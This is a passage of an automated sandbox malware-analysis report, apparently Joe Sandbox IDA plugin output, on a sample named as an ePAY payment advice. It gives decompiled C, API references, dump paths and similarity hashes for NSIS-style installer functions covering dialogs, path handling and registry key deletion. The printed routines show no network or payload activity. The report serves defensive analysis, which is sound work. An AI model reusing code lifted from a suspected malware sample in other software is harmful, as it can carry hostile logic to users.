					goto L59;
				}
			}

0x6e16183b
0x6e161845
0x6e16184e
0x6e161851
0x6e161856
0x6e16185f
0x6e161868
0x6e16186a
0x6e161871
0x6e161873
0x6e161876
0x6e16187a
0x6e161886
0x6e16188f
0x6e161894
0x6e161897
0x6e16189d
0x6e16189d
0x6e1618a0
0x6e1618a3
0x6e1618a6
0x6e16196c
0x6e16196c
0x6e16196f
0x6e1619e9
0x6e1619ed
0x6e1619fc
0x6e1619ff
0x6e161a07
0x6e161a07
0x6e161a07
0x6e161a09
0x6e161a09
0x6e161a0a
0x6e161a0a
0x6e161a0c
0x6e161a0e
0x6e161a14
0x6e161a1d
0x6e161a2e
0x6e161a39
0x6e161a39
0x6e161a01
0x6e1619e4
0x6e1619e4
0x6e1619e6
0x6e1619e6
0x00000000
0x6e1619e6
0x6e161a03
0x6e161a05
0x00000000
0x00000000
0x00000000
0x6e161a05
0x6e1619f1
0x6e1619f5
0x00000000
0x6e1619f5
0x6e161971
0x6e161971
0x6e161972
0x6e1619db
0x6e1619dd
0x00000000
0x00000000
0x6e1619df
0x6e1619e2
0x00000000
0x00000000
0x00000000
0x6e1619e2
0x6e161974
0x6e161974
0x6e161975
0x6e1619ae
0x6e1619b2
0x6e1619ce
0x6e1619d1
0x00000000
0x00000000
0x6e1619d3
0x00000000
0x00000000
0x6e1619d5
0x6e1619d7
0x00000000
0x00000000
0x00000000
0x6e1619d9
0x6e1619b4
0x6e1619b8
0x6e1619ba
0x6e1619bc
0x6e1619be
0x6e1619c7
0x6e1619c0
0x6e1619c0
0x6e1619c0
0x00000000
0x6e1619be
0x6e161977
0x6e161977
0x6e16197a
0x6e1619a7
0x6e1619a9
0x00000000
0x6e1619a9
0x6e16197c
0x6e16197c
0x6e16197f
0x6e16198f
0x6e161993
0x6e1619a0
0x6e1619a2
0x00000000
0x6e1619a2
0x6e161995
0x6e161997
0x00000000
0x00000000
0x6e161999
0x6e16199c
0x00000000
0x00000000
0x00000000
0x6e16199e
0x6e161982
0x6e161983
0x6e161989
0x6e16198b
0x6e16198b
0x00000000
0x6e161983
0x6e1618ac
0x6e161924
0x6e161926
0x6e161929
0x6e161947
0x6e16194a
0x6e161950
0x6e161955
0x6e16192b
0x6e16192b
0x6e16192f
0x6e161933
0x6e161935
0x6e161935
0x6e161958
0x6e16195b
0x00000000
0x6e161961
0x6e161961
0x6e161964
0x00000000
0x6e161964
0x6e16195b
0x6e1618ae
0x6e1618b1
0x6e161915
0x6e161917
0x6e161919
0x00000000
0x00000000
0x00000000
0x6e16191f
0x6e1618b3
0x6e1618b6
0x00000000
0x00000000
0x6e1618b8
0x6e1618b9
0x6e1618ef
0x6e1618f3
0x6e16190b
0x6e16190d
0x00000000
0x6e16190d
0x6e1618f5
0x6e1618f7
0x00000000
0x00000000
0x6e1618fd
0x6e161900
0x00000000
0x00000000
0x00000000
0x6e161906
0x6e1618bb
0x6e1618be
0x6e1618e5
0x00000000
0x6e1618c0
0x6e1618c0
0x6e1618c1
0x6e1618d5
0x6e1618d7
0x6e1618c3
0x6e1618c5
0x6e1618cb
0x6e1618cd
0x6e1618cd
0x6e1618c5
0x00000000
0x6e1618c1

APIs

GlobalFree.KERNEL32 ref: 6E161897
GlobalFree.KERNEL32 ref: 6E161A2E
GlobalFree.KERNEL32 ref: 6E161A33

Memory Dump Source

Source File: 00000000.00000002.839140691.000000006E161000.00000020.00000001.01000000.00000005.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.839133432.000000006E160000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.839147920.000000006E163000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.839153984.000000006E165000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e160000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: 21d3f656e0e716d247f08bf0f678008657412275cc48508a6d25beb39cdcbed9
Instruction ID: 3bfafbb1625ecc2c6e1474fd2ab02bc0af1717b4bb6b5e746064cf7204c19486
Opcode Fuzzy Hash: 21d3f656e0e716d247f08bf0f678008657412275cc48508a6d25beb39cdcbed9
Instruction Fuzzy Hash: 7951F332F54199AEDB40CFEAC4446AEBBB9AB5230AF21445AD40DE3110C7319DEDFB51

Uniqueness

Uniqueness Score: -1.00%

Function 00401D41 Relevance: 7.5, APIs: 5, Instructions: 39
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401D41(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8), __edx);
				GetClientRect(_t25, _t27 - 0x48);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402ACB(_t21), _t21,  *(_t27 - 0x40) *  *(_t27 - 0x20),  *(_t27 - 0x3c) *  *(_t27 - 0x20), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x4237a8 =  *0x4237a8 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}

0x00401d4b
0x00401d52
0x00401d81
0x00401d89
0x00401d90
0x00401d90
0x0040295a
0x00402966

APIs

GetDlgItem.USER32 ref: 00401D45
GetClientRect.USER32 ref: 00401D52
LoadImageA.USER32 ref: 00401D73
SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D81
DeleteObject.GDI32(00000000), ref: 00401D90

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 941616e5af16db9c958634e585695ec054a4be9c703882173472f5b1f1fb6f99
Instruction ID: 236c2df16a83e1707d8be159829b3a1190eecd98233effbe731bed35476ffb6f
Opcode Fuzzy Hash: 941616e5af16db9c958634e585695ec054a4be9c703882173472f5b1f1fb6f99
Instruction Fuzzy Hash: 01F0ECB2A04115BFDB01ABA4DE89DEFBBBCEB44305B044466F601F2191C6749D018B79

Uniqueness

Uniqueness Score: -1.00%

Function 00404852 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00404852(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E00405F8C(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E00405F8C(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E00405F8C(_t41, _t47, 0x41fd08, 0x41fd08, _a8);
				wsprintfA(_t32 + lstrlenA(0x41fd08), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x422ed8, _a4, 0x41fd08);
			}

0x00404858
0x0040485d
0x00404865
0x00404866
0x00404873
0x0040487b
0x0040487c
0x0040487e
0x00404880
0x00404882
0x00404885
0x00404885
0x0040488c
0x00404892
0x00404892
0x00404899
0x004048a0
0x004048a3
0x004048a6
0x004048a6
0x004048aa
0x004048ba
0x004048bc
0x004048bf
0x00404868
0x00404868
0x0040486f
0x0040486f
0x004048c7
0x004048d2
0x004048e8
0x004048f8
0x00404914

APIs

lstrlenA.KERNEL32(0041FD08,0041FD08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,0040476D,000000DF,00000000,00000400,?), ref: 004048F0
wsprintfA.USER32 ref: 004048F8
SetDlgItemTextA.USER32 ref: 0040490B

Strings

%u.%u%s%s, xrefs: 004048DA

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: f42a3f722567b573f866a405e81a790f5d407c7da38f0a888911ea73de824ef5
Instruction ID: 0ac14a548df83272d562d6c5522d93b353c1d491cf82d9c84c752126d1ac48ba
Opcode Fuzzy Hash: f42a3f722567b573f866a405e81a790f5d407c7da38f0a888911ea73de824ef5
Instruction Fuzzy Hash: 2A11D573A041243BDB0065A99C45EAF3288DB85374F254637FE25F71D2EA78CC1285A8

Uniqueness

Uniqueness Score: -1.00%

Function 004059F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E004059F0(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				void* _t22;

				E00405F6A(0x421110, _a4);
				_t21 = E0040599B(0x421110);
				if(_t21 != 0) {
					E004061D4(_t21);
					if(( *0x42371c & 0x00000080) == 0) {
						L5:
						_t22 = _t21 - 0x421110;
						while(1) {
							_t11 = lstrlenA(0x421110);
							_push(0x421110);
							if(_t11 <= _t22) {
								break;
							}
							_t12 = E0040626D();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405949(0x421110);
								continue;
							} else {
								goto L1;
							}
						}
						E00405902();
						return 0 | GetFileAttributesA(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}

0x004059fc
0x00405a07
0x00405a0b
0x00405a12
0x00405a1e
0x00405a2a
0x00405a2a
0x00405a42
0x00405a43
0x00405a4a
0x00405a4b
0x00000000
0x00000000
0x00405a2e
0x00405a35
0x00405a3d
0x00000000
0x00000000
0x00000000
0x00000000
0x00405a35
0x00405a4d
0x00000000
0x00405a61
0x00405a20
0x00405a24
0x00000000
0x00000000
0x00000000
0x00000000
0x00405a24
0x00405a0d
0x00000000

APIs

Part of subcall function 00405F6A: lstrcpynA.KERNEL32(?,?,00000400,004032A8,00422F00,NSIS Error,?,00000006,00000008,0000000A), ref: 00405F77

Part of subcall function 0040599B: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nslD140.tmp,?,00405A07,C:\Users\user\AppData\Local\Temp\nslD140.tmp,C:\Users\user\AppData\Local\Temp\nslD140.tmp,766DFA90,?,C:\Users\user\AppData\Local\Temp\,00405752,?,766DFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004059A9
Part of subcall function 0040599B: CharNextA.USER32(00000000), ref: 004059AE
Part of subcall function 0040599B: CharNextA.USER32(00000000), ref: 004059C2

lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nslD140.tmp,00000000,C:\Users\user\AppData\Local\Temp\nslD140.tmp,C:\Users\user\AppData\Local\Temp\nslD140.tmp,766DFA90,?,C:\Users\user\AppData\Local\Temp\,00405752,?,766DFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A43
GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\nslD140.tmp,C:\Users\user\AppData\Local\Temp\nslD140.tmp,C:\Users\user\AppData\Local\Temp\nslD140.tmp,C:\Users\user\AppData\Local\Temp\nslD140.tmp,C:\Users\user\AppData\Local\Temp\nslD140.tmp,C:\Users\user\AppData\Local\Temp\nslD140.tmp,00000000,C:\Users\user\AppData\Local\Temp\nslD140.tmp,C:\Users\user\AppData\Local\Temp\nslD140.tmp,766DFA90,?,C:\Users\user\AppData\Local\Temp\,00405752,?,766DFA90,C:\Users\user\AppData\Local\Temp\), ref: 00405A53

Strings

C:\Users\user\AppData\Local\Temp\nslD140.tmp, xrefs: 004059F6, 004059FB, 00405A01, 00405A3C, 00405A42, 00405A4A, 00405A52
C:\Users\user\AppData\Local\Temp\, xrefs: 004059F0

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nslD140.tmp
API String ID: 3248276644-1031099865
Opcode ID: 3317ae5885fe5557bfe6bd01748d3a5579ce53a26439151f89887cafc9669dc2
Instruction ID: b63be7d1610f08e16cf97c71acc26f165dc25b1935d551b17c13779f5e49e68e
Opcode Fuzzy Hash: 3317ae5885fe5557bfe6bd01748d3a5579ce53a26439151f89887cafc9669dc2
Instruction Fuzzy Hash: 24F0C826315D6156C622237A2C86AAF5644CE87324709473FF851B22D2DA3C89539E7E

Uniqueness

Uniqueness Score: -1.00%

Function 00405902 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405902(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409014);
				}
				return _t7;
			}

0x00405903
0x0040591a
0x00405922
0x00405922
0x0040592a

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004031C3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033E8,?,00000006,00000008,0000000A), ref: 00405908
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004031C3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033E8,?,00000006,00000008,0000000A), ref: 00405911
lstrcatA.KERNEL32(?,00409014,?,00000006,00000008,0000000A), ref: 00405922

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405902

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-823278215
Opcode ID: 7d86c92969947f3077f9a158046bd063bc506289d00538d24d19a3cace2b88b5
Instruction ID: bd87ec63c1f35a98f82bf41febae71866d1aa3f85b5b5a32f8f6ee96ed89cac6
Opcode Fuzzy Hash: 7d86c92969947f3077f9a158046bd063bc506289d00538d24d19a3cace2b88b5
Instruction Fuzzy Hash: C6D0A9A26069316ED2022315AC09EEB2A0CCF16319B040022F600B62A2CA3C1D418BFE

Uniqueness

Uniqueness Score: -1.00%

Function 00402BCD Relevance: 6.1, APIs: 4, Instructions: 63
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00402BCD(void* __eflags, void* _a4, char* _a8, signed int _a12) {
				void* _v8;
				char _v272;
				void* _t19;
				signed int _t25;
				intOrPtr* _t27;
				signed int _t32;
				signed int _t33;
				signed int _t34;

				_t33 = _a12;
				_t34 = _t33 & 0x00000300;
				_t32 = _t33 & 0x00000001;
				_t19 = E00405DF0(__eflags, _a4, _a8, _t34 | 0x00000008,  &_v8);
				if(_t19 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						__eflags = _t32;
						if(__eflags != 0) {
							RegCloseKey(_v8);
							return 0x3eb;
						}
						_t25 = E00402BCD(__eflags, _v8,  &_v272, _a12);
						__eflags = _t25;
						if(_t25 != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00406302(3);
					if(_t27 == 0) {
						return RegDeleteKeyA(_a4, _a8);
					}
					return  *_t27(_a4, _a8, _t34, 0);
				}
				return _t19;
			}

0x00402bd8
0x00402be1
0x00402bea
0x00402bf6
0x00402bfd
0x00402c21
0x00402c07
0x00402c09
0x00402c5c
0x00000000
0x00402c62
0x00402c18
0x00402c1d
0x00402c1f
0x00000000
0x00000000
0x00402c1f
0x00402c3b
0x00402c43
0x00402c4a
0x00000000
0x00402c6f
0x00000000
0x00402c55
0x00402c79

APIs

RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C32
RegCloseKey.ADVAPI32(?,?,?), ref: 00402C3B
RegCloseKey.ADVAPI32(?,?,?), ref: 00402C5C

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: Close$Enum
String ID:
API String ID: 464197530-0
Opcode ID: 7491e01b77a4f54db0745fefa8ef52e761586eb4c2d62f00184cdfe08c81871e
Instruction ID: 3f870e478545c218cbf8d1d8c83e1046b3ec80cd8b5b23ff6fd5b08b87a912e1
Opcode Fuzzy Hash: 7491e01b77a4f54db0745fefa8ef52e761586eb4c2d62f00184cdfe08c81871e
Instruction Fuzzy Hash: 76112B36504109FBEF129F91CE09F9E7B69AB48340F104072BE05B51E0E7B5AE11ABA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040599B Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040599B(CHAR* _a4) {
				CHAR* _t5;
				char* _t7;
				CHAR* _t9;
				char _t10;
				CHAR* _t11;
				void* _t13;

				_t11 = _a4;
				_t9 = CharNextA(_t11);
				_t5 = CharNextA(_t9);
				_t10 =  *_t11;
				if(_t10 == 0 ||  *_t9 != 0x3a || _t9[1] != 0x5c) {
					if(_t10 != 0x5c || _t11[1] != _t10) {
						L10:
						return 0;
					} else {
						_t13 = 2;
						while(1) {
							_t13 = _t13 - 1;
							_t7 = E0040592D(_t5, 0x5c);
							if( *_t7 == 0) {
								goto L10;
							}
							_t5 = _t7 + 1;
							if(_t13 != 0) {
								continue;
							}
							return _t5;
						}
						goto L10;
					}
				} else {
					return CharNextA(_t5);
				}
			}

0x004059a4
0x004059ab
0x004059ae
0x004059b0
0x004059b4
0x004059c9
0x004059e8
0x00000000
0x004059d0
0x004059d2
0x004059d3
0x004059d6
0x004059d7
0x004059df
0x00000000
0x00000000
0x004059e1
0x004059e4
0x00000000
0x00000000
0x00000000
0x004059e4
0x00000000
0x004059d3
0x004059c1
0x00000000
0x004059c2

APIs

CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nslD140.tmp,?,00405A07,C:\Users\user\AppData\Local\Temp\nslD140.tmp,C:\Users\user\AppData\Local\Temp\nslD140.tmp,766DFA90,?,C:\Users\user\AppData\Local\Temp\,00405752,?,766DFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004059A9
CharNextA.USER32(00000000), ref: 004059AE
CharNextA.USER32(00000000), ref: 004059C2

Strings

C:\Users\user\AppData\Local\Temp\nslD140.tmp, xrefs: 0040599C

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: CharNext
String ID: C:\Users\user\AppData\Local\Temp\nslD140.tmp
API String ID: 3213498283-706521243
Opcode ID: 10bc9b63e27fd2895a2a79afc72dfc96a7ed1041d934c6f985c348dce719f526
Instruction ID: b251aa3e985fa887116ab65003500a8f213bfb7e3cc2aa31c3213714dbeb82a6
Opcode Fuzzy Hash: 10bc9b63e27fd2895a2a79afc72dfc96a7ed1041d934c6f985c348dce719f526
Instruction Fuzzy Hash: 22F0CDD1908F60AAFB3252684C45B675E88CB56371F1800ABE240A62C282B848408FAA

Uniqueness

Uniqueness Score: -1.00%

Function 00402CFF Relevance: 6.0, APIs: 4, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402CFF(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x4168c0; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x423710;
						if(_t2 >  *0x423710) {
							_t3 = CreateDialogParamA( *0x423700, 0x6f, 0, E00402C7C, 0);
							 *0x4168c0 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E0040633E(0);
					}
				} else {
					_t6 =  *0x4168c0; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x4168c0 = 0;
					return _t6;
				}
			}

0x00402d06
0x00402d20
0x00402d26
0x00402d30
0x00402d36
0x00402d3c
0x00402d4d
0x00402d56
0x00000000
0x00402d5b
0x00402d62
0x00402d28
0x00402d2f
0x00402d2f
0x00402d08
0x00402d08
0x00402d0f
0x00402d12
0x00402d12
0x00402d18
0x00402d1f
0x00402d1f

APIs

DestroyWindow.USER32(00000000,00000000,00402EDF,00000001), ref: 00402D12
GetTickCount.KERNEL32 ref: 00402D30
CreateDialogParamA.USER32(0000006F,00000000,00402C7C,00000000), ref: 00402D4D
ShowWindow.USER32(00000000,00000005), ref: 00402D5B

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 10c80b0613a78b839ad02c7969bec3604bf4f1206715e27e9f15991f3fdd17a2
